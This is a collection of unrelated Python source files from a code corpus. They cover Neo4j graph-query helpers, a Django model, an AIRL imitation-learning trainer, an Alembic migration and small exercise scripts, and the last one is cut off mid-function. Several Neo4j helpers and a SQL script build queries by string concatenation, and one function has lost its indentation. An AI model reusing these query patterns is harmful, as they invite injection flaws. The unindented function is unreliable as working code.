| ScopeaFrance/rental-1 | website_rentals/models/product.py | product.py | py | 2,535 | python | en | code | null | github-code | 13 |
def perception(tx, agent):
    """
    Provides the local environment for the given agent
    :param tx: write transaction for neo4j database
    :param agent: id number for agent
    :return: Node the agent is located at followed by the outgoing edges of that node and those edges end nodes.
    """
    query = ("MATCH (m:Agent)-[s:LOCATED]->(n:Node) "
             "WITH n, m "
             "WHERE m.id={agent} "
             "MATCH (n)-[r:REACHES]->(a) "
             "RETURN n, r, a")
    rows = tx.run(query, agent=agent).values()
    if not rows:
        return rows
    current_node = rows[0][0]
    outgoing = [row[1] for row in rows]
    return [current_node] + outgoing
def locateagent(tx, agent):
    """
    Finds which node the given agent is currently located at.
    :param tx: read or write transaction for neo4j database
    :param agent: agent id number
    :return: Node the agent is currently located at
    """
    rows = tx.run("MATCH (m:Agent)-[s:LOCATED]->(n:Node) "
                  "WHERE m.id={agent} "
                  "RETURN n", agent=agent).values()
    return rows[0][0]
def updatecontactedge(tx, node_a, node_b, attribute, value, label_a=None, label_b=None):
    """
    Update a value on a SOCIAL edge based on the nodes at each end.
    :param tx: write transaction for neo4j database
    :param node_a: id of first node
    :param node_b: id of second node
    :param attribute: attribute to be updated
    :param value: new value of attribute
    :param label_a: label of first node
    :param label_b: label of second node
    :return: None
    """
    # Labels and the attribute name are interpolated directly into the
    # query string, so they must be trusted identifiers (not user input).
    query = "MATCH (a"
    if label_a:
        query = query + ":" + label_a
    query = query + ")-[r:SOCIAL]->(b"
    if label_b:
        query = query + ":" + label_b
    query = query + ") WHERE a.id={node_a} and b.id={node_b} SET r." + attribute + "={value} "
    tx.run(query, node_a=node_a, node_b=node_b, value=value)
def deletecontact(tx, node_a, node_b, label_a, label_b, contact_type='SOCIAL'):
    """
    Deletes a contact edge in the database.
    :param tx: neo4j write transaction
    :param node_a: id of source node
    :param node_b: id of target node
    :param label_a: label of source node
    :param label_b: label of target node
    :param contact_type: label of relationship (any relationship type is
        matched when this is falsy)
    :return: None
    """
    # Node ids are interpolated with str(); labels must be trusted
    # identifiers since they are concatenated into the query directly.
    query = "MATCH (a:" + label_a + ")-[r"
    if contact_type:
        query = query + ":" + contact_type
    query = query + "]->(b:" + label_b + ") WHERE a.id=" + str(node_a) + " and b.id=" + str(node_b)
    query = query + " DELETE r RETURN COUNT(r)"
    tx.run(query)
def agentcontacts(tx, node_a, label, contact_label=None):
    """
    Returns outgoing SOCIAL contact edges from a node
    :param tx: neo4j read or write transaction
    :param node_a: source node id
    :param label: source node label
    :param contact_label: label of the contacted nodes (defaults to *label*)
    :return: list of SOCIAL relationship objects; the end nodes are matched
        but not included in the returned list
    """
    if contact_label:
        contact_label = ": " + contact_label
    else:
        contact_label = ": " + label
    results = tx.run("MATCH (a:" + label + ")-[r:SOCIAL]->(b" + contact_label + ") "
                     "WHERE a.id={node_a} "
                     "RETURN r, b", node_a=node_a).values()
    # Keep only the relationship (index 0); the end node (index 1) is dropped.
    return [res[0] for res in results]
def colocated(tx, agent):
    """
    Find agents at the same physical node as the given agent
    :param tx: neo4j read or write transaction
    :param agent: agent id
    :return: List of co-located agents (includes the given agent itself)
    """
    # The previous query piped only ``n`` through WITH and then filtered on
    # ``m`` (already out of scope), and reused the relationship variable
    # ``s`` in the second MATCH, which constrains both matches to the same
    # relationship.  Filter before WITH and use anonymous relationships.
    results = tx.run("MATCH (m:Agent)-[:LOCATED]->(n:Node) "
                     "WHERE m.id={agent} "
                     "WITH n "
                     "MATCH (a:Agent)-[:LOCATED]->(n) "
                     "RETURN a", agent=agent).values()
    return [res[0] for res in results]
def getnode(tx, nodeid, label=None, uid=None):
    """
    Returns the details of a given node
    :param tx: neo4j read or write transaction
    :param nodeid: id for wanted node
    :param label: node label
    :param uid: name of the id property to match on (defaults to "id")
    :return: Node object
    """
    if not uid:
        uid = "id"
    # Adjacent string literals below concatenate into a single query string.
    if label == "Agent":
        query = "MATCH (n:Agent) ""WHERE n." + uid + " = {id} ""RETURN n"
        # NOTE(review): the ``lab`` parameter is not referenced by the query
        # text, so passing it here is harmless but unused.
        results = tx.run(query, id=nodeid, lab=label).values()
    elif label:
        query = "MATCH (n:" + label + ") ""WHERE n." + uid + " = {id} ""RETURN n"
        results = tx.run(query, id=nodeid).values()
    else:
        query = "MATCH (n) ""WHERE n." + uid + " = {id} ""RETURN n"
        results = tx.run(query, id=nodeid).values()
    # Raises IndexError if no node matched.
    node = results[0][0]
    return node
def getnodeagents(tx, nodeid, uid="name"):
"""
Finds all agents currently located at a node
:param tx: neo4j read or write transaction
:param nodeid: id of node
:param uid: type of id node uses
:return: List of agents at node
"""
query = "MATCH (a)-[r:LOCATED]->(n) ""WHERE n." + uid + " ={id} ""RETURN a"
results = tx.run(query, id=nodeid).values()
results = [res[0] for res in results]
return results
def getnodevalue(tx, node, value, label=None, uid=None):
    """
    Retrieves a particular value from a node
    :param tx: neo4j read or write transaction
    :param node: id of the node (interpolated into the query via str())
    :param value: attribute to return
    :param label: label of the node (defaults to Node)
    :param uid: name of the id property to match on (defaults to "id")
    :return: value of attribute asked for
    """
    if not uid:
        uid = "id"
    if label:
        query = "MATCH (a:" + label + ") ""WHERE a." + uid + "=" + str(node) + " ""RETURN a." + value
    else:
        query = "MATCH (a:Node) ""WHERE a." + uid + "=" + str(node) + " ""RETURN a." + value
    # NOTE(review): the id is baked into the query above, so the ``node``
    # query parameter passed here is unused by the query text.
    results = tx.run(query, node=node).value()
    return results[0]
def getrunname(tx):
    """
    Retrieve the label formed for this run, saved in node in database
    :param tx: neo4j read or write transaction
    :return: run name string
    """
    return tx.run("MATCH (a:Tag) RETURN a.tag").value()[0]
def gettime(tx):
    """
    Retrieves the current time on the database clock
    :param tx: neo4j read or write transaction
    :return: Current time on clock
    """
    return tx.run("MATCH (a:Clock) RETURN a.time").value()[0]
def tick(tx):
    """
    Increment the clock in the database
    :param tx: neo4j write transaction
    :return: result object of the update query (not the new time itself)
    """
    # Read the current time, then write back time + 1.
    time = 1 + gettime(tx)
    query = "MATCH (a:Clock) ""SET a.time={time} "
    return tx.run(query, time=time)
def shortestpath(tx, node_a, node_b, node_label, edge_label, directed=False):
    """
    Returns the length of the shortest path between two nodes
    :param tx: neo4j read or write transaction
    :param node_a: first node id
    :param node_b: second node id
    :param node_label: label for both nodes (NOTE(review): currently unused
        by the query below)
    :param edge_label: label for the type of relationships to use in path
    :param directed: whether to consider direction of path in calculations
    :return: Length of shortest path between two nodes
    """
    if directed:
        directionality = 'OUTGOING'
    else:
        directionality = 'BOTH'
    # NOTE(review): ``algo.shortestPath`` appears to target the legacy Neo4j
    # Graph Algorithms plugin (superseded by GDS) -- confirm availability.
    query = "MATCH (a) WHERE a.id=" + str(node_a) + " WITH a MATCH (b) WHERE b.id=" + str(node_b) + " WITH a, b "
    query = query + "CALL algo.shortestPath(a, b,null, {relationshipQuery:'" + edge_label
    query = query + "', direction: '" + directionality + "'}) YIELD totalCost RETURN totalCost"
    sp = tx.run(query).values()[0]
    return sp[0]
def updateedge(tx, edge, attr, value, uid=None):
    """
    Modify an attribute of an edge
    :param tx: neo4j write transaction
    :param edge: relationship object (only REACHES edges between Node
        endpoints are matched by the query below)
    :param attr: attribute to modify
    :param value: new value of attribute
    :param uid: name of the node id property used to re-identify the edge
        endpoints (defaults to "id")
    :return: None
    """
    if not uid:
        uid = "id"
    # The edge is re-located via its endpoint ids rather than an element id.
    start = edge.start_node
    end = edge.end_node
    query = "MATCH (a:Node)-[r:REACHES]->(b:Node) ""WHERE a." + uid + "={start} AND b." + uid + \
            "={end} ""SET r." + attr + "={val}"
    tx.run(query, start=start[uid], end=end[uid], val=value)
def updatenode(tx, node, attr, value, uid=None, label=None):
    """
    Update attribute of a node
    :param tx: neo4j write transaction
    :param node: node id
    :param attr: attribute to be updated (interpolated into the query, so it
        must be a trusted identifier)
    :param value: new value for the attribute
    :param uid: name of the id property to match on (defaults to "id")
    :param label: label of the node (defaults to Node)
    :return: None
    """
    if not uid:
        uid = "id"
    if not label:
        label = "Node"
    query = "MATCH (a:" + label + ") ""WHERE a." + uid + "={node} ""SET a." + attr + "={value}"
    tx.run(query, node=node, value=value)
def updateagent(tx, node, attr, value, uid=None):
    """
    Update an agents attribute value.
    :param tx: neo4j write transaction
    :param node: agent id
    :param attr: attribute to be updated (interpolated into the query, so it
        must be a trusted identifier)
    :param value: new value of attribute
    :param uid: name of the id property to match on (defaults to "id")
    :return: None
    """
    if not uid:
        uid = "id"
    query = "MATCH (a:Agent) ""WHERE a." + uid + "={node} ""SET a." + attr + "={value}"
    tx.run(query, node=node, value=value)
def deleteagent(tx, agent, uid=None):
    """
    Delete an agent and it's location in database
    :param tx: neo4j write transaction
    :param agent: agent node/record; its id is read via ``agent[uid]``
    :param uid: name of the id property (defaults to "id")
    :return: None
    """
    if not uid:
        uid = "id"
    # Remove the LOCATED relationship first: Neo4j refuses to delete a node
    # that still has relationships attached.
    tx.run("MATCH (n:Agent)-[r:LOCATED]->() ""WHERE n." + uid + "={ID} ""DELETE r", ID=agent[uid])
    tx.run("MATCH (n:Agent) ""WHERE n." + uid + "={ID} ""DELETE n", ID=agent[uid])
def addagent(tx, node, label, params, uid=None):
    """
    Insert a new agent into the system
    :param tx: neo4j write transaction
    :param node: node to locate agent at (its id is read via ``node[uid]``)
    :param label: label of the new agent node
    :param params: dict of extra properties for the agent; values are
        interpolated via str() without quoting, so string values must be
        pre-quoted by the caller
    :param uid: name of the node id property (defaults to "id")
    :return: None
    """
    if not uid:
        uid = "id"
    # New id = highest existing id + 1 (0 when none exist).
    # NOTE(review): this read-then-write is not safe under concurrent
    # writers -- two transactions could pick the same id.
    query = "MATCH (n: " + label + ") ""WITH n ""ORDER BY n.id DESC ""RETURN n.id"
    highest_id = tx.run(query).values()
    if highest_id:
        agent_id = highest_id[0][0] + 1
    else:
        agent_id = 0
    query = "CREATE (a:" + label + " {id:" + str(agent_id)
    for param in params:
        query = query + ", " + param + ":" + str(params[param])
    query = query + "})-[r:LOCATED]->(n)"
    tx.run("MATCH (n:Node) ""WHERE n." + uid + "= '" + node[uid] + "' " + query)
def createedge(tx, node_a, node_b, label_a, label_b, edge_label, parameters=None):
    """
    Adds and edge between to nodes with attributes and label as given
    :param tx: neo4j write transaction
    :param node_a: source node id
    :param node_b: target node id
    :param label_a: source node label
    :param label_b: target node label
    :param edge_label: label of new edge
    :param parameters: properties of the new edge; stringified via str(), so
        it should already render as Cypher "key: value" pairs
    :return: None
    """
    query = "MATCH (a:" + label_a + ") WHERE a.id=" + str(node_a) + " WITH a MATCH (b:" + label_b + ") " \
                                                                    "WHERE b.id=" + str(
        node_b) + " " \
                  "WITH a, b " \
                  "CREATE (a)-[n:" + edge_label
    if parameters:
        query = query + " {" + str(parameters) + "}"
    query = query + "]->(b) "
    tx.run(query)
| faulknerrainford/SPmodelling | SPmodelling/Interface.py | Interface.py | py | 11,458 | python | en | code | 0 | github-code | 13 |
24388798956 | # -*- coding: utf-8 -*-
from django.db import models
class Exam(models.Model):
    """Exam model; verbose names are shown in Ukrainian in the admin."""

    class Meta(object):
        verbose_name = u"Іспит"
        verbose_name_plural = u"Іспити"

    # Subject title of the exam.
    title = models.CharField(
        max_length=256,
        blank=False,
        verbose_name=u"Назва предмету")

    # NOTE(review): labelled "date and time" but stored as a DateField, so
    # the time of day is not persisted -- confirm whether that is intended.
    datetime = models.DateField(
        blank=False,
        verbose_name=u"Дата та час проведення",
        null=True)

    # NOTE(review): "teatcher_name" is misspelled; renaming it would
    # require a schema migration, so it is left as-is here.
    teatcher_name = models.CharField(
        max_length=256,
        verbose_name=u"Імя викладача",
        blank=True,
        null=True)

    # Group the exam belongs to (optional).
    group = models.ForeignKey('Group',
                              verbose_name=u"Група",
                              blank=True,
                              null=True)

    def __unicode__(self):
        # Python 2-style string representation: just the exam title.
        return u"%s" % (self.title)
| anna777/new-work | students/models/exams.py | exams.py | py | 757 | python | uk | code | 0 | github-code | 13 |
5619410036 | from auto_server import settings
import hashlib
import rsa
import base64
def gen_key(time):
    """Return the MD5 hex digest of ``"<settings.KEY>|<time>"``."""
    payload = '{}|{}'.format(settings.KEY, time)
    return hashlib.md5(payload.encode('utf-8')).hexdigest()
def decrypt(value):
    """Decrypt *value* with the configured RSA private key.

    RSA can only decrypt one key-sized block at a time, so the ciphertext is
    processed in ``settings.RSA_LENGTH``-byte chunks and the plaintext
    chunks are joined back together.

    :param value: ciphertext bytes, a concatenation of RSA blocks
    :return: decrypted plaintext bytes
    """
    key_str = base64.standard_b64decode(settings.PRIV_KEY)
    pk = rsa.PrivateKey.load_pkcs1(key_str)
    chunks = [
        rsa.decrypt(value[i:i + settings.RSA_LENGTH], pk)
        for i in range(0, len(value), settings.RSA_LENGTH)
    ]
    return b''.join(chunks)
| wkiii/CMDB-oldboy | auto_server/utils/security.py | security.py | py | 584 | python | en | code | 0 | github-code | 13 |
2250494489 | """Adversarial Inverse Reinforcement Learning (AIRL)."""
from typing import Optional
import torch as th
from stable_baselines3.common import base_class, policies, vec_env
from stable_baselines3.sac import policies as sac_policies
from imitation.algorithms import base
from imitation.algorithms.adversarial import common
from imitation.rewards import reward_nets
STOCHASTIC_POLICIES = (sac_policies.SACPolicy, policies.ActorCriticPolicy)
class AIRL(common.AdversarialTrainer):
    """Adversarial Inverse Reinforcement Learning (`AIRL`_).

    .. _AIRL: https://arxiv.org/abs/1710.11248
    """

    def __init__(
        self,
        *,
        demonstrations: base.AnyTransitions,
        demo_batch_size: int,
        venv: vec_env.VecEnv,
        gen_algo: base_class.BaseAlgorithm,
        reward_net: reward_nets.RewardNet,
        **kwargs,
    ):
        """Builds an AIRL trainer.

        Args:
            demonstrations: Demonstrations from an expert (optional). Transitions
                expressed directly as a `types.TransitionsMinimal` object, a sequence
                of trajectories, or an iterable of transition batches (mappings from
                keywords to arrays containing observations, etc).
            demo_batch_size: The number of samples in each batch of expert data. The
                discriminator batch size is twice this number because each discriminator
                batch contains a generator sample for every expert sample.
            venv: The vectorized environment to train in.
            gen_algo: The generator RL algorithm that is trained to maximize
                discriminator confusion. Environment and logger will be set to
                `venv` and `custom_logger`.
            reward_net: Reward network; used as part of AIRL discriminator.
            **kwargs: Passed through to `AdversarialTrainer.__init__`.

        Raises:
            TypeError: If `gen_algo.policy` does not have an `evaluate_actions`
                attribute (present in `ActorCriticPolicy`), needed to compute
                log-probability of actions.
        """
        super().__init__(
            demonstrations=demonstrations,
            demo_batch_size=demo_batch_size,
            venv=venv,
            gen_algo=gen_algo,
            reward_net=reward_net,
            **kwargs,
        )
        # AIRL needs a policy from STOCHASTIC_POLICIES to compute discriminator output.
        # Checked after super().__init__ so self.gen_algo is guaranteed set.
        if not isinstance(self.gen_algo.policy, STOCHASTIC_POLICIES):
            raise TypeError(
                "AIRL needs a stochastic policy to compute the discriminator output.",
            )

    def logits_expert_is_high(
        self,
        state: th.Tensor,
        action: th.Tensor,
        next_state: th.Tensor,
        done: th.Tensor,
        log_policy_act_prob: Optional[th.Tensor] = None,
    ) -> th.Tensor:
        r"""Compute the discriminator's logits for each state-action sample.

        In Fu's AIRL paper (https://arxiv.org/pdf/1710.11248.pdf), the
        discriminator output was given as

        .. math::

            D_{\theta}(s,a) =
            \frac{ \exp{r_{\theta}(s,a)} } { \exp{r_{\theta}(s,a)} + \pi(a|s) }

        with a high value corresponding to the expert and a low value corresponding to
        the generator.

        In other words, the discriminator output is the probability that the action is
        taken by the expert rather than the generator.

        The logit of the above is given as

        .. math::

            \operatorname{logit}(D_{\theta}(s,a)) = r_{\theta}(s,a) - \log{ \pi(a|s) }

        which is what is returned by this function.

        Args:
            state: The state of the environment at the time of the action.
            action: The action taken by the expert or generator.
            next_state: The state of the environment after the action.
            done: whether a `terminal state` (as defined under the MDP of the task) has
                been reached.
            log_policy_act_prob: The log probability of the action taken by the
                generator, :math:`\log{ \pi(a|s) }`.

        Returns:
            The logits of the discriminator for each state-action sample.

        Raises:
            TypeError: If `log_policy_act_prob` is None.
        """
        if log_policy_act_prob is None:
            raise TypeError(
                "Non-None `log_policy_act_prob` is required for this method.",
            )
        reward_output_train = self._reward_net(state, action, next_state, done)
        # logit(D) = r_theta(s, a) - log pi(a|s), as derived in the docstring.
        return reward_output_train - log_policy_act_prob

    @property
    def reward_train(self) -> reward_nets.RewardNet:
        return self._reward_net

    @property
    def reward_test(self) -> reward_nets.RewardNet:
        """Returns the unshaped version of reward network used for testing."""
        reward_net = self._reward_net
        # Recursively return the base network of the wrapped reward net
        while isinstance(reward_net, reward_nets.RewardNetWrapper):
            reward_net = reward_net.base
        return reward_net
| HumanCompatibleAI/imitation | src/imitation/algorithms/adversarial/airl.py | airl.py | py | 5,092 | python | en | code | 1,004 | github-code | 13 |
8235553584 | import pandas as pd
from funciones import sql
def indicadores(semestres):
"""
Test.
"""
columnas = [
'orden', 'escuela_id', 'escuela', 'semestre', 'proceso',
# 'orden', 'departamento_id', 'departamento', 'semestre', 'proceso',
'a_tiempo', 'fuera_tiempo', 'total', 'fecha_inicio', 'fecha_fin'
]
muchos_dataframe = []
for semestre in semestres:
query = f'''EXEC sga.kw_indicadores_cronograma_cumplimiento_escuelas '{semestre}' '''
# query = f'''EXEC sga.kw_indicadores_cronograma_cumplimiento_departamento '{semestre}' '''
consulta = sql.extraer_datos(query)
dataframe = pd.DataFrame(consulta, columns=columnas)
muchos_dataframe.append(dataframe)
# dataframe.to_excel(f'./data/{semestre}.xlsx', index=False)
# print(f'Archivo {semestre}.xlsx creado.')
guardar_resultados = pd.concat(muchos_dataframe)
guardar_resultados.to_excel('./data/escuela_indicadores.xlsx', index=False)
return 'Archivos creados.'
def egresados(semestre):
    """Fetch graduate records for one semester and tag each row with it."""
    query = f''' EXEC kw_escuela_egresados '01','09','{semestre}' '''
    with sql.obtener_cursor() as cursor:
        cursor.execute(query)
        headers = [column[0] for column in cursor.description]
        rows = cursor.fetchall()
    result = pd.DataFrame(rows, columns=headers)
    result['semestre'] = semestre
    return result
# Semesters to export (two terms per academic year).
SEMESTRES = [
    '2017-1', '2017-2', '2018-1', '2018-2', '2019-1', '2019-2',
    '2020-1', '2020-2', '2021-1', '2021-2', '2022-1', '2022-2'
]
# INDICADOR = indicadores(SEMESTRES)
# print(INDICADOR)
# Pull graduate data per semester and write everything into one Excel file.
dataframes = list(map(egresados, SEMESTRES))
save_result = pd.concat(dataframes)
save_result.to_excel('./data/egresados_civil.xlsx', index=False)
print('Finish!')
| LeninElio/moodle_api | data_test.py | data_test.py | py | 1,852 | python | es | code | 0 | github-code | 13 |
73155932816 | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 14 13:01:03 2021
@author: danaukes
"""
import glob
import os
import argparse
from pdf2image import convert_from_path, convert_from_bytes
from pdf2image.exceptions import (
PDFInfoNotInstalledError,
PDFPageCountError,
PDFSyntaxError
)
def extract(path):
    """Convert every PDF matching *path* (a glob pattern) to PNG images.

    Pages of multi-page PDFs get a zero-padded page suffix; pages wider
    than 3000 pixels are scaled down to that width.
    """
    for pdf in glob.glob(path):
        folder, file = os.path.split(pdf)
        file_root, _ = os.path.splitext(file)
        images = convert_from_path(pdf)
        suffix = '' if len(images) == 1 else '_{0:03.0f}'
        for page_number, image in enumerate(images):
            scale = 3000 / image.width
            if scale < 1:
                image = image.resize((int(scale * image.width), int(scale * image.height)))
            target = os.path.join(folder, '{0}{1}.png'.format(file_root, suffix.format(page_number)))
            image.save(target, 'png')
if __name__=='__main__':
    # CLI entry point: accepts one or more glob patterns and converts every
    # matching PDF in place.
    parser = argparse.ArgumentParser()
    parser.add_argument('path',metavar='path',type=str,help='path', default = None,nargs='+')
    args = parser.parse_args()
    # Expand ~ and normalise each supplied pattern before globbing.
    paths = [os.path.normpath(os.path.expanduser(item)) for item in args.path]
    for path in paths:
        extract(path)
| danb0b/code_media_tools | python/media_tools/pdf_tools/pdf_to_png.py | pdf_to_png.py | py | 1,284 | python | en | code | 0 | github-code | 13 |
28475560036 | from collections import defaultdict
import math
def find(arr, option = 2):
    """Summarise room visits from (room, visitor, time) event triples.

    Events come in entry/exit pairs per (room, visitor): the first event of
    a pair records the entry time, the second closes the visit.  For each
    room the summary tuple depends on *option*:

        0 -> (room, unique_visitors)
        1 -> (room, unique_visitors, average_visit_time)
        2 -> (room, unique_visitors, average_visit_time,
              longest_total_time_by_a_single_visitor)

    The summary is printed (as before) and now also returned so callers
    can use it programmatically.
    """
    arr.sort(key=lambda x: int(x[2]))  # process events in time order

    uniqueVisitors = dict()          # room -> distinct visitor count
    visits = dict()                  # room -> completed visit count
    allVisitors = defaultdict(set)   # room -> visitor ids seen so far
    Time = dict()                    # room -> total time spent by everyone
    entryVisit = dict()              # (room, visitor) -> open entry time
    highVisit = dict()               # room -> longest total time by one visitor
    roomNumbers = set()
    highVisitorsTime = dict()        # (room, visitor) -> accumulated time

    for roomNumber, visitorNumber, time in arr:
        roomNumbers.add(roomNumber)
        if visitorNumber not in allVisitors[roomNumber]:
            uniqueVisitors[roomNumber] = 1 + uniqueVisitors.get(roomNumber, 0)
            allVisitors[roomNumber].add(visitorNumber)
        if (roomNumber, visitorNumber) not in entryVisit:
            # First event of the pair: remember the entry time.
            entryVisit[(roomNumber, visitorNumber)] = time
        else:
            # Second event: close the visit and update the aggregates.
            entryTime = entryVisit[(roomNumber, visitorNumber)]
            timeSpent = int(time) - int(entryTime)
            Time[roomNumber] = timeSpent + Time.get(roomNumber, 0)
            visits[roomNumber] = 1 + visits.get(roomNumber, 0)
            highVisitorsTime[(roomNumber, visitorNumber)] = timeSpent + highVisitorsTime.get((roomNumber, visitorNumber), 0)
            highestVisitTime = highVisit.get(roomNumber, 0)
            currVisitorTime = highVisitorsTime[(roomNumber, visitorNumber)]
            if currVisitorTime > highestVisitTime:
                highVisit[roomNumber] = currVisitorTime
            del entryVisit[(roomNumber, visitorNumber)]

    res = []
    for currRoomNumber in roomNumbers:
        currUniqueVisitors = uniqueVisitors[currRoomNumber]
        currAverage = round(Time[currRoomNumber] / visits[currRoomNumber])
        currhighestVisitTime = highVisit[currRoomNumber]
        if option == 0:
            res.append((currRoomNumber, currUniqueVisitors))
        elif option == 1:
            res.append((currRoomNumber, currUniqueVisitors, currAverage))
        elif option == 2:
            res.append((currRoomNumber, currUniqueVisitors, currAverage, currhighestVisitTime))
    res.sort(key=lambda x: int(x[0]))
    print(res)
    return res
# Sample event log: (room, visitor, timestamp) triples in arbitrary order.
test_case = [('15', '3', '61'), ('15', '3', '45'), ('6', '0', '91'), ('10', '4', '76'), ('6', '0', '86'), ('6', '4', '2'), ('10', '1', '47'), ('6', '3', '17'), ('6', '4', '41'), ('15', '3', '36'), ('6', '2', '97'), ('15', '4', '58'), ('6', '0', '16'), ('10', '2', '21'), ('10', '4', '75'), ('6', '0', '76'), ('15', '4', '50'), ('10', '1', '64'), ('6', '3', '3'), ('15', '3', '35'), ('6', '2', '96'), ('10', '2', '35'), ('10', '2', '77'), ('10', '2', '48')]
find(test_case, 2)
47190419964 | from diffop_experiments import MNISTRotModule
def process_dataset(module):
    """Compute and print per-channel mean/std of a datamodule's training set.

    NOTE(review): this averages per-sample standard deviations, which is an
    approximation of the dataset-wide std (see the linked thread); confirm
    that is acceptable before reusing the numbers as normalisation
    constants.

    :param module: a Lightning-style datamodule with ``setup`` and
        ``train_dataloader``
    :return: (mean, std) tensors, one entry per channel
    """
    module.setup("fit")
    loader = module.train_dataloader()

    # See https://discuss.pytorch.org/t/about-normalization-using-pre-trained-vgg16-networks/23560/6
    mean = 0.
    std = 0.
    nb_samples = 0.
    for data, _ in loader:
        batch_samples = data.size(0)
        # Flatten the spatial dimensions: (N, C, H, W) -> (N, C, H*W).
        data = data.view(batch_samples, data.size(1), -1)
        mean += data.mean(2).sum(0)
        std += data.std(2).sum(0)
        nb_samples += batch_samples

    mean /= nb_samples
    std /= nb_samples
    # .item() only works for a single channel (e.g. MNIST); previously the
    # print crashed for multi-channel data, so fall back to the tensor repr.
    if mean.numel() == 1:
        print("Mean:", mean.item())
        print("Std:", std.item())
    else:
        print("Mean:", mean)
        print("Std:", std)
    return mean, std
if __name__ == "__main__":
process_dataset(MNISTRotModule(batch_size=128, validation_size=0, normalize=False, upsample=False, pad=False))
# To check whether the normalization is implemented correctly, you can instead comment out these lines
# Mean should be close to 0 and std close to 1
# process_dataset(MNISTRotModule(batch_size=128, validation_size=0, normalize=True, upsample=False, pad=False)) | ejnnr/steerable_pdo_experiments | calculate_dataset_stats.py | calculate_dataset_stats.py | py | 1,043 | python | en | code | 0 | github-code | 13 |
# Simulate passengers boarding/leaving train wagons from console commands.
wagons = int(input())
trains = [0] * wagons

command = input()
while command != "End":
    action, *args = command.split()
    if action == 'add':
        # "add <people>" boards people onto the last wagon.
        trains[-1] += int(args[0])
    elif action == 'insert':
        # "insert <wagon> <people>" boards people onto a specific wagon.
        trains[int(args[0])] += int(args[1])
    elif action == 'leave':
        # "leave <wagon> <people>" removes people from a specific wagon.
        trains[int(args[0])] -= int(args[1])
    command = input()
print(trains)
| Andon-ov/Python-Fundamentals | 13_lists_advanced_lab/02_trains.py | 02_trains.py | py | 479 | python | en | code | 0 | github-code | 13 |
# CodeChef BSCOST: per test case, the answer is the cheaper of the two
# operation costs when the binary string contains both symbols, else 0.
for _ in range(int(input())):
    N, X, Y = map(int, input().split())
    S = input()
    if '0' in S and '1' in S:
        print(min(X, Y))
    else:
        print(0)
16345290072 | """user tokens
Revision ID: bb5ed0594ba7
Revises: 3ec18dbfc7ff
Create Date: 2018-06-13 21:54:36.866578
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'bb5ed0594ba7'
down_revision = '3ec18dbfc7ff'
branch_labels = None
depends_on = None
def upgrade():
    """Apply this migration: add lookup indexes on the garden location
    columns and introduce API-token columns (with a unique index) on user."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_index(op.f('ix_garden_address'), 'garden', ['address'], unique=False)
    op.create_index(op.f('ix_garden_lat'), 'garden', ['lat'], unique=False)
    op.create_index(op.f('ix_garden_lon'), 'garden', ['lon'], unique=False)
    # Columns are nullable so existing user rows remain valid; token
    # uniqueness is enforced by the unique index below.
    op.add_column('user', sa.Column('token', sa.String(length=32), nullable=True))
    op.add_column('user', sa.Column('token_expiration', sa.DateTime(), nullable=True))
    op.create_index(op.f('ix_user_token'), 'user', ['token'], unique=True)
    # ### end Alembic commands ###
def downgrade():
    """Revert this migration: drop the user token index/columns and the
    garden location indexes added by upgrade()."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_index(op.f('ix_user_token'), table_name='user')
    op.drop_column('user', 'token_expiration')
    op.drop_column('user', 'token')
    op.drop_index(op.f('ix_garden_lon'), table_name='garden')
    op.drop_index(op.f('ix_garden_lat'), table_name='garden')
    op.drop_index(op.f('ix_garden_address'), table_name='garden')
    # ### end Alembic commands ###
| grbarker/GardenApp | migrations/versions/bb5ed0594ba7_user_tokens.py | bb5ed0594ba7_user_tokens.py | py | 1,347 | python | en | code | 0 | github-code | 13 |
37190237266 | """
File: extension.py
------------------
This is a file for creating an optional extension program, if
you'd like to do so.
"""
import random
MIN_ANSWER = 1
MAX_ANSWER = 20
def main():
    """Keep answering questions until the user submits an empty one."""
    while True:
        if question() == "":
            break
        create_random_answer()
def question():
    """Prompt the user for a yes/no question and return the raw input."""
    return input("Ask a yes or no question: ")
def create_random_answer():
    """Draw a random answer index and print the matching response."""
    roll = random.randint(MIN_ANSWER, MAX_ANSWER)
    check(roll)
def check(value):
    """Print (and return) the Magic 8-Ball response for *value*.

    Values 1-19 each map to a fixed response; any other value falls back
    to "You may rely on it" (matching the original if/elif chain, whose
    final else also covered 20).
    """
    # A lookup table replaces the original 20-branch if/elif chain;
    # every message is byte-for-byte unchanged.
    responses = {
        1: "As I see it, yes.",
        2: "Ask again later.",
        3: "Better not tell you now.",
        4: "Cannot predict now.",
        5: "Concentrate and ask again.",
        6: "Don’t count on it.",
        7: "It is certain.",
        8: "It is decidedly so.",
        9: "Most likely.",
        10: "My reply is no.",
        11: "My sources say no.",
        12: "Outlook not so good.",
        13: "Outlook good.",
        14: "Reply hazy, try again.",
        15: "Signs point to yes.",
        16: "Very doubtful.",
        17: "Without a doubt.",
        18: "Yes.",
        19: "Yes – definitely.",
    }
    message = responses.get(value, "You may rely on it")
    print(message)
    # Returning the message is new but backward-compatible (callers
    # previously received the implicit None and ignored it).
    return message
# This provided line is required at the end of a Python file
# to call the main() function.
if __name__ == '__main__':
    main()  # run the Magic 8-Ball loop only when executed as a script
7158477497 | '''Crie um programa que leia um numero inteiro e
mostre na tela se ele e par ou impar.
r1 (amarelo)
r2 (azul)
r3 (laranja)
'''
# Read an integer and report whether it is even (PAR) or odd (IMPAR).
num = int(input('Digite um numero: '))
if num % 2 == 0:
    print('O numero {} e PAR'.format(num))
else:
    print('O numero {} e IMPAR'.format(num))
12229756958 | import numpy as np
import pandas as pd
from sklearn.linear_model import Lasso
from sklearn.metrics import r2_score
from sklearn.model_selection import train_test_split
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from joblib import dump
def plotting(income,lim,rating,cards,r2):
    """Plot Lasso coefficient paths (top panel) and R^2 (bottom panel)
    against the regularization strength alpha, saving to plot.pdf.

    The arguments are parallel lists with one entry per alpha value in
    range(0, 10000, 50) — this must match the grid used in alpha_param().
    The Agg backend is in use, so the figure is written, never shown.
    """
    fig = plt.figure()
    axes = fig.add_subplot(211)
    # Share the x axis so both panels line up over the same alpha values.
    ax = fig.add_subplot(212, sharex=axes)
    plotrange= range(0, 10000,50)
    axes.plot(plotrange, rating, color='b', label="Rating")
    axes.plot(plotrange, lim, color='y',label="Limit")
    axes.plot(plotrange, income, color='g',label="Income")
